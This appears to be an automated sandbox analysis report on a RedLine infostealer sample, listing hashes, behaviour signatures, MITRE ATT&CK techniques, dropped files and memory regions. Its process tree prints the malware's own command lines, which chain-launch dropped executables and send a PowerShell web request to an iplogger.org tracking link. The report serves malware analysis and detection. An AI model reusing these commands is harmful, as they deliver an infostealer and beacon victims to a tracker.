Analysis

  • max time kernel
    151s
  • max time network
    142s
  • platform
    windows7_x64
  • resource
    win7-en-20211208
  • submitted
    05-02-2022 12:41

General

  • Target

    d23aaa6690b8141985a4237e4660246f83a59460d1fc7.exe

  • Size

    1.8MB

  • MD5

    80286211e348fb262323c664430553f2

  • SHA1

    c9a55f6c23c55d33925635fcee5fb72ad4c3f001

  • SHA256

    d23aaa6690b8141985a4237e4660246f83a59460d1fc7c614ae88eeea9d7fd4a

  • SHA512

    9cbd4b8b5622879180ea23859cd2611c093673231ba1567a2dff0198998861c68eac7cf9a830b498af121c79fe5c06aea67b7dab429af8c3e58b84d1bc42f122

Malware Config

Signatures

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine Payload 4 IoCs
  • .NET Reactor proctector 2 IoCs

    Detects an executable protected by an unregistered version of Eziriz's .NET Reactor.

  • Downloads MZ/PE file
  • Executes dropped EXE 4 IoCs
  • Loads dropped DLL 6 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • HTTP links in PDF interactive object 3 IoCs

    Detects HTTP links in interactive objects within PDF files.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 1 IoCs
  • NSIS installer 6 IoCs
  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Modifies system certificate store 2 TTPs 3 IoCs
  • Suspicious behavior: EnumeratesProcesses 11 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 6 IoCs
  • Suspicious use of WriteProcessMemory 38 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\d23aaa6690b8141985a4237e4660246f83a59460d1fc7.exe
    "C:\Users\Admin\AppData\Local\Temp\d23aaa6690b8141985a4237e4660246f83a59460d1fc7.exe"
    1⤵
    • Loads dropped DLL
    • Suspicious use of WriteProcessMemory
    PID:836
    • C:\Windows\SysWOW64\cmd.exe
      "cmd" /c start "" "PRO3.exe" & powershell -command "Invoke-WebRequest -Uri https://iplogger.org/1qfDf7"
      2⤵
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:1512
      • C:\Users\Admin\AppData\Local\Temp\PRO3.exe
        "PRO3.exe"
        3⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • Modifies system certificate store
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:944
        • C:\Users\Admin\AppData\Local\Temp\srvs.exe
          "C:\Users\Admin\AppData\Local\Temp\srvs.exe"
          4⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • Suspicious use of WriteProcessMemory
          PID:1740
          • C:\Windows\SysWOW64\cmd.exe
            "cmd" /c start "" "softt.exe" & start "" "stats.exe" & powershell -command "Invoke-WebRequest -Uri https://iplogger.org/1FZsr7"
            5⤵
            • Loads dropped DLL
            • Suspicious use of WriteProcessMemory
            PID:1592
            • C:\Users\Admin\AppData\Local\Temp\softt.exe
              "softt.exe"
              6⤵
              • Executes dropped EXE
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:1672
            • C:\Users\Admin\AppData\Local\Temp\stats.exe
              "stats.exe"
              6⤵
              • Executes dropped EXE
              • Checks processor information in registry
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of WriteProcessMemory
              PID:948
              • C:\Windows\system32\WerFault.exe
                C:\Windows\system32\WerFault.exe -u -p 948 -s 1136
                7⤵
                • Program crash
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious behavior: GetForegroundWindowSpam
                • Suspicious use of AdjustPrivilegeToken
                PID:1172
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              powershell -command "Invoke-WebRequest -Uri https://iplogger.org/1FZsr7"
              6⤵
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:1584
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        powershell -command "Invoke-WebRequest -Uri https://iplogger.org/1qfDf7"
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:952

Network

MITRE ATT&CK Matrix ATT&CK v6

Defense Evasion

Install Root Certificate

1
T1130

Modify Registry

1
T1112

Credential Access

Credentials in Files

2
T1081

Discovery

Query Registry

2
T1012

System Information Discovery

2
T1082

Collection

Data from Local System

2
T1005

Command and Control

Web Service

1
T1102

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\PRO3.exe
    MD5

    65e7c318b287d76fc2729f4c691291c6

    SHA1

    8290b23b03fe9725cb378df76a26cd6908ac262e

    SHA256

    972bb04ab6b0252ad83ea08e89829a86610dbd23d96030338f76c4a992e3e680

    SHA512

    51d2aed1bf77703db3bc220b08f0e6fef4a679420c8a29b4341c0bd128e660214fa6bc35ba9827a9278224d39f4485c695004de1d0dd029966346c6ae7ca5cfc

  • C:\Users\Admin\AppData\Local\Temp\PRO3.exe
    MD5

    65e7c318b287d76fc2729f4c691291c6

    SHA1

    8290b23b03fe9725cb378df76a26cd6908ac262e

    SHA256

    972bb04ab6b0252ad83ea08e89829a86610dbd23d96030338f76c4a992e3e680

    SHA512

    51d2aed1bf77703db3bc220b08f0e6fef4a679420c8a29b4341c0bd128e660214fa6bc35ba9827a9278224d39f4485c695004de1d0dd029966346c6ae7ca5cfc

  • C:\Users\Admin\AppData\Local\Temp\softt.exe
    MD5

    974a369ab219c32bc50d9b171ec1b39e

    SHA1

    d98a2df6536a2274ff7bdf9b61a00e292ae29ec4

    SHA256

    e923995356925fb2abbc72b8a7db2df56b4b84954265361017962d24c579b50a

    SHA512

    1fc490c672e4dc48d44e1c605f3bf3c45b097f7356185385387185cac3e380ed61d4610ea4fe650de7f4b96f57131b00b210c958276390ea26e25090e8205468

  • C:\Users\Admin\AppData\Local\Temp\softt.exe
    MD5

    974a369ab219c32bc50d9b171ec1b39e

    SHA1

    d98a2df6536a2274ff7bdf9b61a00e292ae29ec4

    SHA256

    e923995356925fb2abbc72b8a7db2df56b4b84954265361017962d24c579b50a

    SHA512

    1fc490c672e4dc48d44e1c605f3bf3c45b097f7356185385387185cac3e380ed61d4610ea4fe650de7f4b96f57131b00b210c958276390ea26e25090e8205468

  • C:\Users\Admin\AppData\Local\Temp\srvs.exe
    MD5

    3c5469525a6671937480ccebc7232857

    SHA1

    fc1d87784065dd01dba97cbac050971d8bebbe9f

    SHA256

    464124fa27783258e7af84f18986f39cacac3c90e40268c50407a2a271836b84

    SHA512

    c52c826e2c5f24e1700efaab47ecd806a9ab782f988331cade6bdb2517c3b598127265f60fe19d7d0eca9cdc2d18d1e9d5893f4cc686fecbb9bbcf11013586c3

  • C:\Users\Admin\AppData\Local\Temp\srvs.exe
    MD5

    3c5469525a6671937480ccebc7232857

    SHA1

    fc1d87784065dd01dba97cbac050971d8bebbe9f

    SHA256

    464124fa27783258e7af84f18986f39cacac3c90e40268c50407a2a271836b84

    SHA512

    c52c826e2c5f24e1700efaab47ecd806a9ab782f988331cade6bdb2517c3b598127265f60fe19d7d0eca9cdc2d18d1e9d5893f4cc686fecbb9bbcf11013586c3

  • C:\Users\Admin\AppData\Local\Temp\stats.exe
    MD5

    303a61eee0b232a9865c107aa3de3ba8

    SHA1

    573153bf0ed69380d553e763652fbeea8c62b991

    SHA256

    875c6d921d1f340078c9b68838405d90fabd2aa58d49fdf75f22eb5230848009

    SHA512

    4c803581e0f9be8576ad8d879c0651d0011f31dcfb69f691371e36b645763412946c16342dce0561ce34776ca2da0a090c520ea240ba8e93a8ada1398c44d0c4

  • C:\Users\Admin\AppData\Local\Temp\stats.exe
    MD5

    303a61eee0b232a9865c107aa3de3ba8

    SHA1

    573153bf0ed69380d553e763652fbeea8c62b991

    SHA256

    875c6d921d1f340078c9b68838405d90fabd2aa58d49fdf75f22eb5230848009

    SHA512

    4c803581e0f9be8576ad8d879c0651d0011f31dcfb69f691371e36b645763412946c16342dce0561ce34776ca2da0a090c520ea240ba8e93a8ada1398c44d0c4

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
    MD5

    6200caa5e17d0bca60fcfa8556ab441b

    SHA1

    9bdf323e83ebaeadc1fd94979f934afa9d73294d

    SHA256

    8751596bc8c4c7d078f4dbb8ba0bd82cc202a962547d336ea21c6c9ec8a91f07

    SHA512

    e6ae5e3fc1ebf4a7232b3ae15f3947d6eced8deb826e395e3f1f068a694ef85e6eda10a6cbd65a17c9115419b1c086bf9b1442f225d425bdddc2b24b90dacae8

  • \??\PIPE\srvsvc
    MD5

    d41d8cd98f00b204e9800998ecf8427e

    SHA1

    da39a3ee5e6b4b0d3255bfef95601890afd80709

    SHA256

    e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

    SHA512

    cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

  • \Users\Admin\AppData\Local\Temp\PRO3.exe
    MD5

    65e7c318b287d76fc2729f4c691291c6

    SHA1

    8290b23b03fe9725cb378df76a26cd6908ac262e

    SHA256

    972bb04ab6b0252ad83ea08e89829a86610dbd23d96030338f76c4a992e3e680

    SHA512

    51d2aed1bf77703db3bc220b08f0e6fef4a679420c8a29b4341c0bd128e660214fa6bc35ba9827a9278224d39f4485c695004de1d0dd029966346c6ae7ca5cfc

  • \Users\Admin\AppData\Local\Temp\nsqA4C7.tmp\M17UDIQ8KE.dll
    MD5

    293165db1e46070410b4209519e67494

    SHA1

    777b96a4f74b6c34d43a4e7c7e656757d1c97f01

    SHA256

    49b7477db8dd22f8cf2d41ee2d79ce57797f02e8c7b9e799951a6c710384349a

    SHA512

    97012139f2da5868fe8731c0b0bcb3cfda29ed10c2e6e2336b504480c9cd9fb8f4728cca23f1e0bd577d75daa542e59f94d1d341f4e8aaeebc7134bf61288c19

  • \Users\Admin\AppData\Local\Temp\nswFD91.tmp\GKHSI4XFB1.dll
    MD5

    293165db1e46070410b4209519e67494

    SHA1

    777b96a4f74b6c34d43a4e7c7e656757d1c97f01

    SHA256

    49b7477db8dd22f8cf2d41ee2d79ce57797f02e8c7b9e799951a6c710384349a

    SHA512

    97012139f2da5868fe8731c0b0bcb3cfda29ed10c2e6e2336b504480c9cd9fb8f4728cca23f1e0bd577d75daa542e59f94d1d341f4e8aaeebc7134bf61288c19

  • \Users\Admin\AppData\Local\Temp\softt.exe
    MD5

    974a369ab219c32bc50d9b171ec1b39e

    SHA1

    d98a2df6536a2274ff7bdf9b61a00e292ae29ec4

    SHA256

    e923995356925fb2abbc72b8a7db2df56b4b84954265361017962d24c579b50a

    SHA512

    1fc490c672e4dc48d44e1c605f3bf3c45b097f7356185385387185cac3e380ed61d4610ea4fe650de7f4b96f57131b00b210c958276390ea26e25090e8205468

  • \Users\Admin\AppData\Local\Temp\srvs.exe
    MD5

    3c5469525a6671937480ccebc7232857

    SHA1

    fc1d87784065dd01dba97cbac050971d8bebbe9f

    SHA256

    464124fa27783258e7af84f18986f39cacac3c90e40268c50407a2a271836b84

    SHA512

    c52c826e2c5f24e1700efaab47ecd806a9ab782f988331cade6bdb2517c3b598127265f60fe19d7d0eca9cdc2d18d1e9d5893f4cc686fecbb9bbcf11013586c3

  • \Users\Admin\AppData\Local\Temp\stats.exe
    MD5

    303a61eee0b232a9865c107aa3de3ba8

    SHA1

    573153bf0ed69380d553e763652fbeea8c62b991

    SHA256

    875c6d921d1f340078c9b68838405d90fabd2aa58d49fdf75f22eb5230848009

    SHA512

    4c803581e0f9be8576ad8d879c0651d0011f31dcfb69f691371e36b645763412946c16342dce0561ce34776ca2da0a090c520ea240ba8e93a8ada1398c44d0c4

  • memory/836-54-0x0000000076121000-0x0000000076123000-memory.dmp
    Filesize

    8KB

  • memory/944-80-0x00000000758F0000-0x0000000075925000-memory.dmp
    Filesize

    212KB

  • memory/944-73-0x00000000748B0000-0x0000000074930000-memory.dmp
    Filesize

    512KB

  • memory/944-60-0x0000000074A30000-0x0000000074A7A000-memory.dmp
    Filesize

    296KB

  • memory/944-75-0x0000000076120000-0x0000000076D6A000-memory.dmp
    Filesize

    12.3MB

  • memory/944-79-0x0000000075080000-0x0000000075097000-memory.dmp
    Filesize

    92KB

  • memory/944-62-0x0000000001100000-0x00000000012B1000-memory.dmp
    Filesize

    1.7MB

  • memory/944-81-0x0000000070830000-0x00000000709C0000-memory.dmp
    Filesize

    1.6MB

  • memory/944-82-0x0000000074600000-0x0000000074617000-memory.dmp
    Filesize

    92KB

  • memory/944-83-0x0000000074350000-0x0000000074365000-memory.dmp
    Filesize

    84KB

  • memory/944-84-0x000000006CC30000-0x000000006CC82000-memory.dmp
    Filesize

    328KB

  • memory/944-85-0x0000000074340000-0x000000007434D000-memory.dmp
    Filesize

    52KB

  • memory/944-86-0x00000000754B0000-0x00000000754C9000-memory.dmp
    Filesize

    100KB

  • memory/944-87-0x000000006CB80000-0x000000006CBCF000-memory.dmp
    Filesize

    316KB

  • memory/944-88-0x000000006CBD0000-0x000000006CC28000-memory.dmp
    Filesize

    352KB

  • memory/944-89-0x0000000075180000-0x000000007518C000-memory.dmp
    Filesize

    48KB

  • memory/944-91-0x0000000074EF0000-0x0000000074F0C000-memory.dmp
    Filesize

    112KB

  • memory/944-92-0x0000000076E00000-0x0000000076E27000-memory.dmp
    Filesize

    156KB

  • memory/944-93-0x0000000074F30000-0x0000000074F74000-memory.dmp
    Filesize

    272KB

  • memory/944-94-0x000000006CAB0000-0x000000006CAED000-memory.dmp
    Filesize

    244KB

  • memory/944-95-0x00000000759E0000-0x00000000759EC000-memory.dmp
    Filesize

    48KB

  • memory/944-96-0x0000000075380000-0x000000007549D000-memory.dmp
    Filesize

    1.1MB

  • memory/944-97-0x000000006CAF0000-0x000000006CB28000-memory.dmp
    Filesize

    224KB

  • memory/944-98-0x0000000075990000-0x00000000759D5000-memory.dmp
    Filesize

    276KB

  • memory/944-99-0x000000006CA70000-0x000000006CA8C000-memory.dmp
    Filesize

    112KB

  • memory/944-100-0x0000000074F80000-0x0000000074F8B000-memory.dmp
    Filesize

    44KB

  • memory/944-101-0x00000000754D0000-0x00000000754E2000-memory.dmp
    Filesize

    72KB

  • memory/944-102-0x0000000075D60000-0x0000000075EFD000-memory.dmp
    Filesize

    1.6MB

  • memory/944-103-0x000000006C960000-0x000000006C975000-memory.dmp
    Filesize

    84KB

  • memory/944-105-0x00000000747B0000-0x00000000747C6000-memory.dmp
    Filesize

    88KB

  • memory/944-104-0x000000006CA50000-0x000000006CA5E000-memory.dmp
    Filesize

    56KB

  • memory/944-106-0x00000000754D0000-0x00000000754E2000-memory.dmp
    Filesize

    72KB

  • memory/944-107-0x0000000075D60000-0x0000000075EFD000-memory.dmp
    Filesize

    1.6MB

  • memory/944-108-0x00000000754D0000-0x00000000754E2000-memory.dmp
    Filesize

    72KB

  • memory/944-109-0x0000000075D60000-0x0000000075EFD000-memory.dmp
    Filesize

    1.6MB

  • memory/944-110-0x00000000754D0000-0x00000000754E2000-memory.dmp
    Filesize

    72KB

  • memory/944-111-0x0000000075D60000-0x0000000075EFD000-memory.dmp
    Filesize

    1.6MB

  • memory/944-112-0x000000006C860000-0x000000006C955000-memory.dmp
    Filesize

    980KB

  • memory/944-63-0x00000000000F0000-0x00000000000F1000-memory.dmp
    Filesize

    4KB

  • memory/944-78-0x0000000000B50000-0x0000000000CC0000-memory.dmp
    Filesize

    1.4MB

  • memory/944-72-0x0000000076D70000-0x0000000076DFF000-memory.dmp
    Filesize

    572KB

  • memory/944-71-0x0000000001100000-0x00000000012B1000-memory.dmp
    Filesize

    1.7MB

  • memory/944-70-0x0000000075FB0000-0x000000007610C000-memory.dmp
    Filesize

    1.4MB

  • memory/944-68-0x0000000000270000-0x00000000002B4000-memory.dmp
    Filesize

    272KB

  • memory/944-67-0x0000000075930000-0x0000000075987000-memory.dmp
    Filesize

    348KB

  • memory/944-66-0x0000000075AC0000-0x0000000075B07000-memory.dmp
    Filesize

    284KB

  • memory/944-65-0x0000000075B70000-0x0000000075C1C000-memory.dmp
    Filesize

    688KB

  • memory/948-149-0x000000001AC70000-0x000000001AC72000-memory.dmp
    Filesize

    8KB

  • memory/948-148-0x0000000000FB0000-0x0000000000FBA000-memory.dmp
    Filesize

    40KB

  • memory/952-74-0x00000000024B0000-0x00000000024B1000-memory.dmp
    Filesize

    4KB

  • memory/952-76-0x00000000024B1000-0x00000000024B2000-memory.dmp
    Filesize

    4KB

  • memory/952-77-0x00000000024B2000-0x00000000024B4000-memory.dmp
    Filesize

    8KB

  • memory/1172-152-0x00000000001E0000-0x00000000001E1000-memory.dmp
    Filesize

    4KB

  • memory/1172-150-0x000007FEFBE11000-0x000007FEFBE13000-memory.dmp
    Filesize

    8KB

  • memory/1584-145-0x0000000002512000-0x0000000002514000-memory.dmp
    Filesize

    8KB

  • memory/1584-144-0x0000000002511000-0x0000000002512000-memory.dmp
    Filesize

    4KB

  • memory/1584-141-0x0000000002510000-0x0000000002511000-memory.dmp
    Filesize

    4KB

  • memory/1672-138-0x0000000076D70000-0x0000000076DFF000-memory.dmp
    Filesize

    572KB

  • memory/1672-146-0x0000000073E50000-0x0000000073E67000-memory.dmp
    Filesize

    92KB

  • memory/1672-137-0x0000000000D80000-0x0000000000E6C000-memory.dmp
    Filesize

    944KB

  • memory/1672-140-0x0000000000210000-0x0000000000254000-memory.dmp
    Filesize

    272KB

  • memory/1672-136-0x0000000075FB0000-0x000000007610C000-memory.dmp
    Filesize

    1.4MB

  • memory/1672-142-0x0000000002920000-0x0000000002921000-memory.dmp
    Filesize

    4KB

  • memory/1672-132-0x0000000075B70000-0x0000000075C1C000-memory.dmp
    Filesize

    688KB

  • memory/1672-133-0x0000000075AC0000-0x0000000075B07000-memory.dmp
    Filesize

    284KB

  • memory/1672-143-0x0000000076120000-0x0000000076D6A000-memory.dmp
    Filesize

    12.3MB

  • memory/1672-139-0x0000000073E70000-0x0000000073EF0000-memory.dmp
    Filesize

    512KB

  • memory/1672-147-0x00000000758F0000-0x0000000075925000-memory.dmp
    Filesize

    212KB

  • memory/1672-134-0x0000000075930000-0x0000000075987000-memory.dmp
    Filesize

    348KB

  • memory/1672-130-0x0000000000100000-0x0000000000101000-memory.dmp
    Filesize

    4KB

  • memory/1672-129-0x0000000000D80000-0x0000000000E6C000-memory.dmp
    Filesize

    944KB

  • memory/1672-151-0x0000000074300000-0x0000000074490000-memory.dmp
    Filesize

    1.6MB

  • memory/1672-126-0x0000000075070000-0x00000000750BA000-memory.dmp
    Filesize

    296KB

  • memory/1672-153-0x0000000074CB0000-0x0000000074CC7000-memory.dmp
    Filesize

    92KB